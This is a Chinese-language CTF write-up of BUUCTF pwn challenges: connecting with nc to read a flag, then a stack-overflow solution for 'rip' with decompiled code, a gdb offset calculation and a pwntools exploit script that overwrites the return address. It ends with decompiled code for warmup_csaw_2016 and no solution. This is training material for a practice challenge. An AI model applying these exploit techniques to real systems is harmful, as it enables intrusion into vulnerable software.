BUUCTF PWN WriteUp

test_your_nc

$ nc node3.buuoj.cn 29017
$ cat /flag

rip

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+1h] [rbp-Fh]

  puts("please input");
  gets(&s, argv);
  puts(&s);
  puts("ok,bye!!!");
  return 0;
}

gets从标准输入设备读字符串函数，其可以无限读取，不会判断上限，以回车结束读取。所以存在栈溢出漏洞。
可以看到有个func：

解题基本上就是栈溢出让RIP跳转到func函数。

$ checksec pwn1

可以看到没开任何保护。
用gdb调试，计算出RIP的偏移：

> pattern create 200
> r
> pattern offset A(AADAA;
23 

IDA中可以看到函数开始的地方是0x401186

编写exp：

# -*- coding:utf-8 -*-

from pwn import *

context.log_level = 'debug'

io = remote('node3.buuoj.cn',29476)
#io = process("./pwn1")
system=0x401186
payload = b'a' * 23 + p64(system)
io.sendline(payload)
io.interactive()

warmup_csaw_2016

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-80h]
  char v5; // [rsp+40h] [rbp-40h]

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(&s, "%p\n", sub_40060D);
  write(1, &s, 9uLL);
  write(1, ">", 1uLL);
  return gets(&v5);
}